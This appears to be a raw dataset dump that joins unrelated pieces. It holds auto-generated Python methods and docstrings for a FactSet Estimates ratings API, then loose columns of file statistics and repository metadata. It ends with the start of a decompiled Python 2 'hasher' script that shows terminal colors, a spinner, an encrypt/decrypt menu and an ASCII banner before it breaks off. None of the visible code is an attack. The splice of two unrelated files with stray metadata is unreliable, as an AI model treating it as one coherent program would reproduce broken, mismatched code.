frequency (str): Controls the frequency of the data returned. * **D** = Daily * **W** = Weekly, based on the last day of the week of the start date. * **AM** = Monthly, based on the start date (e.g., if the start date is June 16, data is displayed for June 16, May 16, April 16 etc.). * **AQ** = Quarterly, based on the start date. * **AY** = Actual Annual, based on the start date. . [optional] if omitted the server will use the default value of "D"
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[ConsensusRatingsResponse]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['ids'] = \
ids
return self.get_consensus_ratings_endpoint.call_with_http_info(**kwargs)
def get_consensus_ratings_with_http_info_async(
self,
ids,
**kwargs
) -> "ApplyResult[typing.Tuple[ConsensusRatingsResponse, int, typing.MutableMapping]]":
"""Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Returns ratings from the FactSet Estimates database for current and historical for an individual security using rolling fiscal dates as of a specific date. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
ids ([str]): Security or Entity identifiers. FactSet Identifiers, tickers, CUSIP and SEDOL are accepted input. <p>***ids limit** = 3000 per request*</p> * Make Note - id limit of 3000 for defaults, otherwise the service is limited to a 30 second duration. This can be reached when increasing total number of metrics requested and depth of history. *
Keyword Args:
start_date (str): Start date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
end_date (str): End date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
frequency (str): Controls the frequency of the data returned. * **D** = Daily * **W** = Weekly, based on the last day of the week of the start date. * **AM** = Monthly, based on the start date (e.g., if the start date is June 16, data is displayed for June 16, May 16, April 16 etc.). * **AQ** = Quarterly, based on the start date. * **AY** = Actual Annual, based on the start date. . [optional] if omitted the server will use the default value of "D"
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(ConsensusRatingsResponse, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['ids'] = \
ids
return self.get_consensus_ratings_endpoint.call_with_http_info(**kwargs)
def get_consensus_ratings_for_list(
self,
consensus_ratings_request,
**kwargs
) -> ConsensusRatingsResponse:
"""Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Returns ratings from the FactSet Estimates database for current and historical for an individual security using rolling fiscal dates as of a specific date. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
consensus_ratings_request (ConsensusRatingsRequest): Request object for Estimate Data Items.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ConsensusRatingsResponse
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['consensus_ratings_request'] = \
consensus_ratings_request
return self.get_consensus_ratings_for_list_endpoint.call_with_http_info(**kwargs)
def get_consensus_ratings_for_list_with_http_info(
self,
consensus_ratings_request,
**kwargs
) -> typing.Tuple[ConsensusRatingsResponse, int, typing.MutableMapping]:
"""Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Returns ratings from the FactSet Estimates database for current and historical for an individual security using rolling fiscal dates as of a specific date. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
consensus_ratings_request (ConsensusRatingsRequest): Request object for Estimate Data Items.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ConsensusRatingsResponse
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['consensus_ratings_request'] = \
consensus_ratings_request
return self.get_consensus_ratings_for_list_endpoint.call_with_http_info(**kwargs)
def get_consensus_ratings_for_list_async(
self,
consensus_ratings_request,
**kwargs
) -> "ApplyResult[ConsensusRatingsResponse]":
"""Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Returns ratings from the FactSet Estimates database for current and historical for an individual security using rolling fiscal dates as of a specific date. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
consensus_ratings_request (ConsensusRatingsRequest): Request object for Estimate Data Items.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[ConsensusRatingsResponse]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['consensus_ratings_request'] = \
consensus_ratings_request
return self.get_consensus_ratings_for_list_endpoint.call_with_http_info(**kwargs)
def get_consensus_ratings_for_list_with_http_info_async(
self,
consensus_ratings_request,
**kwargs
) -> "ApplyResult[typing.Tuple[ConsensusRatingsResponse, int, typing.MutableMapping]]":
"""Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Returns ratings from the FactSet Estimates database for current and historical for an individual security using rolling fiscal dates as of a specific date. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
consensus_ratings_request (ConsensusRatingsRequest): Request object for Estimate Data Items.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(ConsensusRatingsResponse, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['consensus_ratings_request'] = \
consensus_ratings_request
return self.get_consensus_ratings_for_list_endpoint.call_with_http_info(**kwargs)
def get_detail_ratings(
self,
ids,
**kwargs
) -> DetailRatingsResponse:
"""Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Retrieves the Broker Level ratings for the requested Id and date range. Ratings include Buy, Hold, Sell, Overweight, and Underweight. <p>The `startDate` and `endDate` parameters controls the range of perspective dates. By default, the service will return the range of estimateDates within the latest company's reporting period. As you expand the date range, additional full historical reporting periods and all ratings estimateDates per broker will be returned.</p> # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
ids ([str]): Security or Entity identifiers. FactSet Identifiers, tickers, CUSIP and SEDOL are accepted input. <p>***ids limit** = 3000 per request*</p> * Make Note - id limit of 3000 for defaults, otherwise the service is limited to a 30 second duration. This can be reached when increasing total number of metrics requested and depth of history. *
Keyword Args:
start_date (str): Start date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
end_date (str): End date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
DetailRatingsResponse
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['ids'] = \
ids
return self.get_detail_ratings_endpoint.call_with_http_info(**kwargs)
def get_detail_ratings_with_http_info(
self,
ids,
**kwargs
) -> typing.Tuple[DetailRatingsResponse, int, typing.MutableMapping]:
"""Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Retrieves the Broker Level ratings for the requested Id and date range. Ratings include Buy, Hold, Sell, Overweight, and Underweight. <p>The `startDate` and `endDate` parameters controls the range of perspective dates. By default, the service will return the range of estimateDates within the latest company's reporting period. As you expand the date range, additional full historical reporting periods and all ratings estimateDates per broker will be returned.</p> # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
ids ([str]): Security or Entity identifiers. FactSet Identifiers, tickers, CUSIP and SEDOL are accepted input. <p>***ids limit** = 3000 per request*</p> * Make Note - id limit of 3000 for defaults, otherwise the service is limited to a 30 second duration. This can be reached when increasing total number of metrics requested and depth of history. *
Keyword Args:
start_date (str): Start date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
end_date (str): End date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
DetailRatingsResponse
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['ids'] = \
ids
return self.get_detail_ratings_endpoint.call_with_http_info(**kwargs)
def get_detail_ratings_async(
self,
ids,
**kwargs
) -> "ApplyResult[DetailRatingsResponse]":
"""Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Retrieves the Broker Level ratings for the requested Id and date range. Ratings include Buy, Hold, Sell, Overweight, and Underweight. <p>The `startDate` and `endDate` parameters controls the range of perspective dates. By default, the service will return the range of estimateDates within the latest company's reporting period. As you expand the date range, additional full historical reporting periods and all ratings estimateDates per broker will be returned.</p> # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
ids ([str]): Security or Entity identifiers. FactSet Identifiers, tickers, CUSIP and SEDOL are accepted input. <p>***ids limit** = 3000 per request*</p> * Make Note - id limit of 3000 for defaults, otherwise the service is limited to a 30 second duration. This can be reached when increasing total number of metrics requested and depth of history. *
Keyword Args:
start_date (str): Start date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
end_date (str): End date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[DetailRatingsResponse]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['ids'] = \
ids
return self.get_detail_ratings_endpoint.call_with_http_info(**kwargs)
def get_detail_ratings_with_http_info_async(
self,
ids,
**kwargs
) -> "ApplyResult[typing.Tuple[DetailRatingsResponse, int, typing.MutableMapping]]":
"""Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Retrieves the Broker Level ratings for the requested Id and date range. Ratings include Buy, Hold, Sell, Overweight, and Underweight. <p>The `startDate` and `endDate` parameters controls the range of perspective dates. By default, the service will return the range of estimateDates within the latest company's reporting period. As you expand the date range, additional full historical reporting periods and all ratings estimateDates per broker will be returned.</p> # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
ids ([str]): Security or Entity identifiers. FactSet Identifiers, tickers, CUSIP and SEDOL are accepted input. <p>***ids limit** = 3000 per request*</p> * Make Note - id limit of 3000 for defaults, otherwise the service is limited to a 30 second duration. This can be reached when increasing total number of metrics requested and depth of history. *
Keyword Args:
start_date (str): Start date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
end_date (str): End date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(DetailRatingsResponse, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['ids'] = \
ids
return self.get_detail_ratings_endpoint.call_with_http_info(**kwargs)
def get_detail_ratings_for_list(
self,
detail_ratings_request,
**kwargs
) -> DetailRatingsResponse:
"""Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Retrieves the Broker Level ratings for the requested Id and date range. Ratings include Buy, Hold, Sell, Overweight, and Underweight. <p>The `startDate` and `endDate` parameters controls the range of perspective dates. By default, the service will return the range of estimateDates within the latest company's reporting period. As you expand the date range, additional full historical reporting periods and all ratings estimateDates per broker will be returned.</p> # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
detail_ratings_request (DetailRatingsRequest): Request object for Detail Reatings Data Items.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
DetailRatingsResponse
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['detail_ratings_request'] = \
detail_ratings_request
return self.get_detail_ratings_for_list_endpoint.call_with_http_info(**kwargs)
def get_detail_ratings_for_list_with_http_info(
self,
detail_ratings_request,
**kwargs
) -> typing.Tuple[DetailRatingsResponse, int, typing.MutableMapping]:
"""Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Retrieves the Broker Level ratings for the requested Id and date range. Ratings include Buy, Hold, Sell, Overweight, and Underweight. <p>The `startDate` and `endDate` parameters controls the range of perspective dates. By default, the service will return the range of estimateDates within the latest company's reporting period. As you expand the date range, additional full historical reporting periods and all ratings estimateDates per broker will be returned.</p> # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
detail_ratings_request (DetailRatingsRequest): Request object for Detail Reatings Data Items.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
DetailRatingsResponse
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['detail_ratings_request'] = \
detail_ratings_request
return self.get_detail_ratings_for_list_endpoint.call_with_http_info(**kwargs)
def get_detail_ratings_for_list_async(
self,
detail_ratings_request,
**kwargs
) -> "ApplyResult[DetailRatingsResponse]":
"""Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Retrieves the Broker Level ratings for the requested Id and date range. Ratings include Buy, Hold, Sell, Overweight, and Underweight. <p>The `startDate` and `endDate` parameters controls the range of perspective dates. By default, the service will return the range of estimateDates within the latest company's reporting period. As you expand the date range, additional full historical reporting periods and all ratings estimateDates per broker will be returned.</p> # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
detail_ratings_request (DetailRatingsRequest): Request object for Detail Reatings Data Items.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[DetailRatingsResponse]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['detail_ratings_request'] = \
detail_ratings_request
return self.get_detail_ratings_for_list_endpoint.call_with_http_info(**kwargs)
def get_detail_ratings_for_list_with_http_info_async(
self,
detail_ratings_request,
**kwargs
) -> "ApplyResult[typing.Tuple[DetailRatingsResponse, int, typing.MutableMapping]]":
"""Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Retrieves the Broker Level ratings for the requested Id and date range. Ratings include Buy, Hold, Sell, Overweight, and Underweight. <p>The `startDate` and `endDate` parameters controls the range of perspective dates. By default, the service will return the range of estimateDates within the latest company's reporting period. As you expand the date range, additional full historical reporting periods and all ratings estimateDates per broker will be returned.</p> # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
detail_ratings_request (DetailRatingsRequest): Request object for Detail Reatings Data Items.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(DetailRatingsResponse, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['detail_ratings_request'] = \
detail_ratings_request
return self.get_detail_ratings_for_list_endpoint.call_with_http_info(**kwargs)
| 54.183394
| 859
| 0.609969
| 6,930
| 59,385
| 5.104329
| 0.054545
| 0.024425
| 0.017641
| 0.017188
| 0.93642
| 0.930653
| 0.929975
| 0.921663
| 0.919006
| 0.917819
| 0
| 0.008613
| 0.325486
| 59,385
| 1,095
| 860
| 54.232877
| 0.874476
| 0.638596
| 0
| 0.713647
| 0
| 0
| 0.161264
| 0.069424
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040268
| false
| 0
| 0.026846
| 0
| 0.105145
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3a96f7ee54d1a9bebecdccdb69a1793ea816cce1
| 40,087
|
py
|
Python
|
Hasher/hasher_dec.py
|
Alpha-Demon404/RE-14
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 39
|
2020-02-26T09:44:36.000Z
|
2022-03-23T00:18:25.000Z
|
Hasher/hasher_dec.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 15
|
2020-05-14T10:07:26.000Z
|
2022-01-06T02:55:32.000Z
|
Hasher/hasher_dec.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 41
|
2020-03-16T22:36:38.000Z
|
2022-03-17T14:47:19.000Z
|
# Decompiled At : Fri Apr 10 19:36:05 WIB 2020
# Python bytecode 2.7
import requests, os, random, sys, time, subprocess as sp
from bs4 import BeautifulSoup as bs
G0 = '\x1b[0;32m'
G1 = '\x1b[1;32m'
C0 = '\x1b[0;36m'
C1 = '\x1b[1;36m'
P0 = '\x1b[0;35m'
P1 = '\x1b[1;35m'
W0 = '\x1b[0;37m'
W1 = '\x1b[1;37m'
B0 = '\x1b[0;34m'
B1 = '\x1b[1;34m'
R0 = '\x1b[0;31m'
R1 = '\x1b[1;31m'
Y1 = '\x1b[1;33m'
Y0 = '\x1b[0;33m'
BG = '\x1b[1;97;41m'
RE = '\x1b[0m'
hijau = '\x1b[32m'
cyan = '\x1b[36m'
kuning = '\x1b[33;1m'
ungu = '\x1b[35m'
putih = '\x1b[37m'
merah = '\x1b[31m'
biru = '\x1b[34m'
tip = '%s [%sPilih Tipenya%s]\n%s [%s1%s]%s Encrypt\n%s [%s2%s]%s Decrypt\n' % (putih, cyan, putih, putih, merah, putih, hijau, putih, merah, putih, hijau)
def spin():
try:
L = '\\|/-'
for q in range(10):
time.sleep(0.1)
sys.stdout.write('\r\x1b[1;32m[\x1b[1;33m' + L[(q % len(L))] + '\x1b[1;32m]\x1b[0;37m Loading please wait...')
sys.stdout.flush()
except:
exit()
def ketik(teks):
for i in teks + '\n':
sys.stdout.write(i)
sys.stdout.flush()
time.sleep(0.001)
def load(word):
lix = [
'/', '-', '\xe2\x95\xb2', '|']
for i in range(6):
for x in range(len(lix)):
sys.stdout.write(('\r{}{}').format(str(word), lix[x]))
time.sleep(0.2)
sys.stdout.flush()
licen = '\n %s[%sLICENSE HASHER%s]%sv0.1\n %s|>%s Tenang Licensenya Gratis kok %s<|\n %s|> %s[%sA%s] %sTEKAN A UNTUK CHAT ADMIN %s<|\n' % (merah, putih, merah, kuning, merah, cyan, merah, merah, putih, hijau, putih, cyan, merah)
def metu():
print '%s[%sx%s] %sExiting Program' % (W1, R1, W1, R0)
exit(1)
def main1():
print '\x1b[37m==============================================='
print '\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97 \x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97 \x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97'
print '\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97'
